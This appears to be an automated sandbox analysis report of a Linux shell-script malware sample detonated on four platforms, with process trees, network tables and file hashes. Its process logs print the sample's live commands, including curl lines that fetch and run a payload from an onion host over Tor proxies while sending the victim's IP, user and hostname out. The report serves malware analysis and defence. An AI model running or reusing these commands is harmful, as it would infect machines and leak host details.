Analysis Overview
SHA256
d5b4d0376c9b07f5be237d0e47aa9aa321489917d30559328e544c5d0347e5ea
Threat Level: Shows suspicious behavior
The file 74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118 was found to show suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Looks up external IP address via web service
Deobfuscate/Decode Files or Information
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-24 18:06
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-24 18:05
Reported
2024-10-24 18:09
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
149s
Max time network
132s
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/i | /tmp/i | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.amazonaws.com | N/A | N/A |
Deobfuscate/Decode Files or Information
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/base64 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /usr/bin/id | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/i | /bin/bash | N/A |
Processes
/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
[/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118]
/bin/bash
[bash]
/usr/bin/base64
[base64 -d]
/usr/bin/cut
[cut -d: -f6]
/usr/bin/id
[id -u]
/bin/grep
[grep x:0: /etc/passwd]
/usr/bin/head
[head -n 1 /tmp/.X11-unix/01]
/bin/ls
[ls /proc//status]
/bin/chmod
[chmod +x ./i]
/tmp/i
[./i]
/bin/rm
[rm -f i]
/usr/bin/tr
[tr \n]
/usr/bin/sort
[sort -uR]
/usr/bin/head
[head -n 1]
/bin/grep
[grep -Ev [.]0]
/bin/grep
[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]
/usr/bin/curl
[curl -4fsSLkA- -m200 https://doh-fi.blahdns.com/dns-query?name=relay.tor2socks.in]
/bin/uname
[uname -m]
/usr/bin/cut
[cut -f1 -d-]
/usr/bin/md5sum
[md5sum]
/bin/date
[date]
/usr/bin/curl
[curl -4fsSLk checkip.amazonaws.com]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 1.1.1.1:53 | doh-fi.blahdns.com | udp |
| US | 1.1.1.1:53 | checkip.amazonaws.com | udp |
| US | 151.101.193.91:443 | N/A | tcp |
| GB | 185.125.188.61:443 | N/A | tcp |
| GB | 185.125.188.61:443 | N/A | tcp |
| US | 151.101.193.91:443 | N/A | tcp |
| GB | 89.187.167.6:443 | N/A | tcp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.38:443 | 1527653184.rsc.cdn77.org | tcp |
Files
/tmp/i
| MD5 | f4b524261fce06c1fbd10b4681ad0b97 |
| SHA1 | c595d1a14f6aa42cc1aa7ab4416c39ada07ca89d |
| SHA256 | 9577a8bfed904bd55390ba203f1a233be1981b36fa945537eb3be5b2446de031 |
| SHA512 | ab280f109ee7dcfb8031e160d0235e9bfb72cabde44b21355d9e6db2873530d8537e3bdbb8faf6cd8d6b3eac33f58de7694201b93f277d0b587bf2534df14449 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-24 18:05
Reported
2024-10-24 18:09
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
15s
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/i | /tmp/i | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.amazonaws.com | N/A | N/A |
Deobfuscate/Decode Files or Information
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/base64 | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/id | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/i | /bin/bash | N/A |
Processes
/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
[/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118]
/usr/bin/base64
[base64 -d]
/bin/bash
[bash]
/usr/bin/cut
[cut -d: -f6]
/usr/bin/id
[id -u]
/bin/grep
[grep x:0: /etc/passwd]
/usr/bin/head
[head -n 1 /tmp/.X11-unix/01]
/bin/ls
[ls /proc//status]
/bin/chmod
[chmod +x ./i]
/tmp/i
[./i]
/bin/rm
[rm -f i]
/bin/grep
[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]
/usr/bin/tr
[tr \n]
/usr/bin/curl
[curl -4fsSLkA- -m200 https://dns.digitale-gesellschaft.ch/dns-query?name=relay.tor2socks.in]
/usr/bin/sort
[sort -uR]
/bin/grep
[grep -Ev [.]0]
/usr/bin/head
[head -n 1]
/bin/uname
[uname -m]
/bin/date
[date]
/usr/bin/md5sum
[md5sum]
/usr/bin/cut
[cut -f1 -d-]
/usr/bin/curl
[curl -4fsSLk checkip.amazonaws.com]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | dns.digitale-gesellschaft.ch | udp |
| CH | 185.95.218.42:443 | dns.digitale-gesellschaft.ch | tcp |
| US | 1.1.1.1:53 | checkip.amazonaws.com | udp |
Files
/tmp/i
| MD5 | f4b524261fce06c1fbd10b4681ad0b97 |
| SHA1 | c595d1a14f6aa42cc1aa7ab4416c39ada07ca89d |
| SHA256 | 9577a8bfed904bd55390ba203f1a233be1981b36fa945537eb3be5b2446de031 |
| SHA512 | ab280f109ee7dcfb8031e160d0235e9bfb72cabde44b21355d9e6db2873530d8537e3bdbb8faf6cd8d6b3eac33f58de7694201b93f277d0b587bf2534df14449 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-24 18:05
Reported
2024-10-24 18:13
Platform
debian9-mipsbe-20240611-en
Max time kernel
87s
Max time network
155s
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/i | /tmp/i | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.amazonaws.com | N/A | N/A |
| N/A | checkip.amazonaws.com | N/A | N/A |
Deobfuscate/Decode Files or Information
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/base64 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/id | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /sbin/ip | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /sbin/ip | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/i | /bin/bash | N/A |
Processes
/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
[/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118]
/bin/bash
[bash]
/usr/bin/base64
[base64 -d]
/usr/bin/cut
[cut -d: -f6]
/usr/bin/id
[id -u]
/bin/grep
[grep x:0: /etc/passwd]
/usr/bin/head
[head -n 1 /tmp/.X11-unix/01]
/bin/ls
[ls /proc//status]
/bin/chmod
[chmod +x ./i]
/tmp/i
[./i]
/bin/rm
[rm -f i]
/bin/grep
[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]
/usr/bin/tr
[tr \n]
/usr/bin/sort
[sort -uR]
/bin/grep
[grep -Ev [.]0]
/usr/bin/head
[head -n 1]
/usr/bin/curl
[curl -4fsSLkA- -m200 https://doh.no.ahadns.net/dns-query?name=relay.tor2socks.in]
/bin/uname
[uname -m]
/bin/date
[date]
/usr/bin/md5sum
[md5sum]
/usr/bin/cut
[cut -f1 -d-]
/usr/bin/curl
[curl -4fsSLk checkip.amazonaws.com]
/usr/bin/whoami
[whoami]
/bin/uname
[uname -m]
/bin/uname
[uname -n]
/sbin/ip
[ip a]
/bin/grep
[grep inet ]
/usr/bin/md5sum
[md5sum]
/usr/bin/awk
[awk {print $1}]
/usr/bin/awk
[awk {print $2}]
/usr/bin/base64
[base64 -w0]
/usr/bin/crontab
[crontab -l]
/usr/bin/curl
[curl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./e8eb0a2cdf54c3ac6d6c2fd3f5796222 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_680fff434a0b9c16e89d622a5bd1b890_]
/usr/bin/curl
[curl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./e8eb0a2cdf54c3ac6d6c2fd3f5796222 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_680fff434a0b9c16e89d622a5bd1b890_]
/bin/chmod
[chmod +x ./e8eb0a2cdf54c3ac6d6c2fd3f5796222]
/tmp/e8eb0a2cdf54c3ac6d6c2fd3f5796222
[./e8eb0a2cdf54c3ac6d6c2fd3f5796222]
/bin/rm
[rm -f ./e8eb0a2cdf54c3ac6d6c2fd3f5796222]
/usr/bin/head
[head -n 1 /tmp/.X11-unix/01]
/bin/ls
[ls /proc//status]
/bin/grep
[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]
/usr/bin/tr
[tr \n]
/usr/bin/sort
[sort -uR]
/usr/bin/head
[head -n 1]
/usr/bin/curl
[curl -4fsSLkA- -m200 https://dns.twnic.tw/dns-query?name=relay.tor2socks.in]
/bin/grep
[grep -Ev [.]0]
/bin/uname
[uname -m]
/bin/date
[date]
/usr/bin/md5sum
[md5sum]
/usr/bin/cut
[cut -f1 -d-]
/usr/bin/curl
[curl -4fsSLk checkip.amazonaws.com]
/usr/bin/whoami
[whoami]
/bin/uname
[uname -m]
/bin/uname
[uname -n]
/sbin/ip
[ip a]
/bin/grep
[grep inet ]
/usr/bin/md5sum
[md5sum]
/usr/bin/awk
[awk {print $2}]
/usr/bin/awk
[awk {print $1}]
/usr/bin/crontab
[crontab -l]
/usr/bin/base64
[base64 -w0]
/usr/bin/curl
[curl -4fsSLkA- -m200 -x socks5h://65.108.216.128:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./4db8a69be99c4cf3f0388ff8c87b69b0 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_d41d8cd98f00b204e9800998ecf8427e_]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | doh.no.ahadns.net | udp |
| US | 1.1.1.1:53 | doh.no.ahadns.net | udp |
| US | 1.1.1.1:53 | checkip.amazonaws.com | udp |
| IE | 34.254.128.37:80 | checkip.amazonaws.com | tcp |
| US | 1.1.1.1:53 | ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion | udp |
| US | 1.1.1.1:53 | ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion | udp |
| US | 1.1.1.1:53 | ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in | udp |
| US | 1.1.1.1:53 | dns.twnic.tw | udp |
| TW | 101.101.101.101:443 | dns.twnic.tw | tcp |
| US | 1.1.1.1:53 | checkip.amazonaws.com | udp |
| IE | 34.254.128.37:80 | checkip.amazonaws.com | tcp |
| FI | 65.108.216.128:9050 | N/A | tcp |
Files
/tmp/i
| MD5 | f4b524261fce06c1fbd10b4681ad0b97 |
| SHA1 | c595d1a14f6aa42cc1aa7ab4416c39ada07ca89d |
| SHA256 | 9577a8bfed904bd55390ba203f1a233be1981b36fa945537eb3be5b2446de031 |
| SHA512 | ab280f109ee7dcfb8031e160d0235e9bfb72cabde44b21355d9e6db2873530d8537e3bdbb8faf6cd8d6b3eac33f58de7694201b93f277d0b587bf2534df14449 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-24 18:05
Reported
2024-10-24 18:13
Platform
debian9-mipsel-20240226-en
Max time kernel
124s
Max time network
138s
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/i | /tmp/i | N/A |
| N/A | /tmp/i | /tmp/i | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.amazonaws.com | N/A | N/A |
| N/A | checkip.amazonaws.com | N/A | N/A |
| N/A | checkip.amazonaws.com | N/A | N/A |
| N/A | checkip.amazonaws.com | N/A | N/A |
Deobfuscate/Decode Files or Information
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/base64 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/id | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /sbin/ip | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /sbin/ip | N/A |
| N/A | N/A | /sbin/ip | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /sbin/ip | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/i | /bin/bash | N/A |
Processes
/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
[/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118]
/bin/bash
[bash]
/usr/bin/base64
[base64 -d]
/usr/bin/cut
[cut -d: -f6]
/usr/bin/id
[id -u]
/bin/grep
[grep x:0: /etc/passwd]
/usr/bin/head
[head -n 1 /tmp/.X11-unix/01]
/bin/ls
[ls /proc//status]
/bin/chmod
[chmod +x ./i]
/tmp/i
[./i]
/bin/rm
[rm -f i]
/bin/grep
[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]
/usr/bin/tr
[tr \n]
/usr/bin/sort
[sort -uR]
/usr/bin/head
[head -n 1]
/bin/grep
[grep -Ev [.]0]
/usr/bin/curl
[curl -4fsSLkA- -m200 https://doh-fi.blahdns.com/dns-query?name=relay.tor2socks.in]
/bin/uname
[uname -m]
/bin/date
[date]
/usr/bin/md5sum
[md5sum]
/usr/bin/cut
[cut -f1 -d-]
/usr/bin/curl
[curl -4fsSLk checkip.amazonaws.com]
/usr/bin/whoami
[whoami]
/bin/uname
[uname -m]
/bin/uname
[uname -n]
/bin/grep
[grep inet ]
/usr/bin/md5sum
[md5sum]
/usr/bin/awk
[awk {print $1}]
/sbin/ip
[ip a]
/usr/bin/awk
[awk {print $2}]
/usr/bin/crontab
[crontab -l]
/usr/bin/base64
[base64 -w0]
/usr/bin/curl
[curl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./3d4e2c62a0f0444c5e39a768425ab056 -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]
/usr/bin/curl
[curl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./3d4e2c62a0f0444c5e39a768425ab056 -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]
/bin/chmod
[chmod +x ./3d4e2c62a0f0444c5e39a768425ab056]
/tmp/3d4e2c62a0f0444c5e39a768425ab056
[./3d4e2c62a0f0444c5e39a768425ab056]
/bin/rm
[rm -f ./3d4e2c62a0f0444c5e39a768425ab056]
/usr/bin/head
[head -n 1 /tmp/.X11-unix/01]
/bin/ls
[ls /proc//status]
/bin/grep
[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]
/usr/bin/tr
[tr \n]
/usr/bin/sort
[sort -uR]
/usr/bin/curl
[curl -4fsSLkA- -m200 https://doh.no.ahadns.net/dns-query?name=relay.tor2socks.in]
/usr/bin/head
[head -n 1]
/bin/grep
[grep -Ev [.]0]
/bin/uname
[uname -m]
/usr/bin/cut
[cut -f1 -d-]
/bin/date
[date]
/usr/bin/md5sum
[md5sum]
/usr/bin/curl
[curl -4fsSLk checkip.amazonaws.com]
/usr/bin/whoami
[whoami]
/bin/uname
[uname -m]
/bin/uname
[uname -n]
/sbin/ip
[ip a]
/bin/grep
[grep inet ]
/usr/bin/md5sum
[md5sum]
/usr/bin/awk
[awk {print $2}]
/usr/bin/awk
[awk {print $1}]
/usr/bin/base64
[base64 -w0]
/usr/bin/crontab
[crontab -l]
/usr/bin/curl
[curl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./b18c7b90793d1614c38108eb109f833e -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]
/usr/bin/curl
[curl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./b18c7b90793d1614c38108eb109f833e -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]
/bin/chmod
[chmod +x ./b18c7b90793d1614c38108eb109f833e]
/tmp/b18c7b90793d1614c38108eb109f833e
[./b18c7b90793d1614c38108eb109f833e]
/bin/rm
[rm -f ./b18c7b90793d1614c38108eb109f833e]
/usr/bin/head
[head -n 1 /tmp/.X11-unix/01]
/bin/ls
[ls /proc//status]
/bin/grep
[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]
/usr/bin/tr
[tr \n]
/bin/grep
[grep -Ev [.]0]
/usr/bin/sort
[sort -uR]
/usr/bin/head
[head -n 1]
/usr/bin/curl
[curl -4fsSLkA- -m200 https://uncensored.lux1.dns.nixnet.xyz/dns-query?name=relay.tor2socks.in]
/bin/uname
[uname -m]
/bin/date
[date]
/usr/bin/md5sum
[md5sum]
/usr/bin/cut
[cut -f1 -d-]
/usr/bin/curl
[curl -4fsSLk checkip.amazonaws.com]
/usr/bin/whoami
[whoami]
/bin/uname
[uname -m]
/bin/uname
[uname -n]
/sbin/ip
[ip a]
/bin/grep
[grep inet ]
/usr/bin/awk
[awk {print $2}]
/usr/bin/md5sum
[md5sum]
/usr/bin/awk
[awk {print $1}]
/usr/bin/crontab
[crontab -l]
/usr/bin/base64
[base64 -w0]
/usr/bin/curl
[curl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./5f3b49ef027eb052018f97a43d59ca89 -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]
/usr/bin/curl
[curl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./5f3b49ef027eb052018f97a43d59ca89 -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]
/bin/chmod
[chmod +x ./5f3b49ef027eb052018f97a43d59ca89]
/dev/shm/5f3b49ef027eb052018f97a43d59ca89
[./5f3b49ef027eb052018f97a43d59ca89]
/bin/rm
[rm -f ./5f3b49ef027eb052018f97a43d59ca89]
/usr/bin/head
[head -n 1 /tmp/.X11-unix/01]
/bin/ls
[ls /proc//status]
/bin/chmod
[chmod +x ./i]
/tmp/i
[./i]
/bin/rm
[rm -f i]
/bin/grep
[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]
/usr/bin/tr
[tr \n]
/usr/bin/curl
[curl -4fsSLkA- -m200 https://dns.twnic.tw/dns-query?name=relay.tor2socks.in]
/usr/bin/head
[head -n 1]
/usr/bin/sort
[sort -uR]
/bin/grep
[grep -Ev [.]0]
/bin/uname
[uname -m]
/bin/date
[date]
/usr/bin/md5sum
[md5sum]
/usr/bin/cut
[cut -f1 -d-]
/usr/bin/curl
[curl -4fsSLk checkip.amazonaws.com]
/usr/bin/whoami
[whoami]
/bin/uname
[uname -m]
/bin/uname
[uname -n]
/sbin/ip
[ip a]
/bin/grep
[grep inet ]
/usr/bin/md5sum
[md5sum]
/usr/bin/awk
[awk {print $2}]
/usr/bin/awk
[awk {print $1}]
/usr/bin/crontab
[crontab -l]
/usr/bin/base64
[base64 -w0]
/usr/bin/curl
[curl -4fsSLkA- -m200 -x socks5h://5.10.228.248:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./1b8f4bb809b6d9f7810d0d4d1656553c -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | doh-fi.blahdns.com | udp |
| US | 1.1.1.1:53 | doh-fi.blahdns.com | udp |
| US | 1.1.1.1:53 | checkip.amazonaws.com | udp |
| IE | 54.78.143.177:80 | checkip.amazonaws.com | tcp |
| US | 1.1.1.1:53 | ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion | udp |
| US | 1.1.1.1:53 | ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion | udp |
| US | 1.1.1.1:53 | ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in | udp |
| US | 1.1.1.1:53 | doh.no.ahadns.net | udp |
| US | 1.1.1.1:53 | doh.no.ahadns.net | udp |
| US | 1.1.1.1:53 | checkip.amazonaws.com | udp |
| IE | 52.212.103.61:80 | checkip.amazonaws.com | tcp |
| US | 1.1.1.1:53 | ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion | udp |
| US | 1.1.1.1:53 | ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion | udp |
| US | 1.1.1.1:53 | ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in | udp |
| US | 1.1.1.1:53 | uncensored.lux1.dns.nixnet.xyz | udp |
| LU | 104.244.78.231:443 | uncensored.lux1.dns.nixnet.xyz | tcp |
| US | 1.1.1.1:53 | checkip.amazonaws.com | udp |
| IE | 54.78.143.177:80 | checkip.amazonaws.com | tcp |
| US | 1.1.1.1:53 | ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion | udp |
| US | 1.1.1.1:53 | ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion | udp |
| US | 1.1.1.1:53 | ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in | udp |
| US | 1.1.1.1:53 | dns.twnic.tw | udp |
| TW | 101.101.101.101:443 | dns.twnic.tw | tcp |
| US | 1.1.1.1:53 | checkip.amazonaws.com | udp |
| IE | 54.78.143.177:80 | checkip.amazonaws.com | tcp |
| IQ | 5.10.228.248:9050 | N/A | tcp |
Files
/tmp/i
| MD5 | f4b524261fce06c1fbd10b4681ad0b97 |
| SHA1 | c595d1a14f6aa42cc1aa7ab4416c39ada07ca89d |
| SHA256 | 9577a8bfed904bd55390ba203f1a233be1981b36fa945537eb3be5b2446de031 |
| SHA512 | ab280f109ee7dcfb8031e160d0235e9bfb72cabde44b21355d9e6db2873530d8537e3bdbb8faf6cd8d6b3eac33f58de7694201b93f277d0b587bf2534df14449 |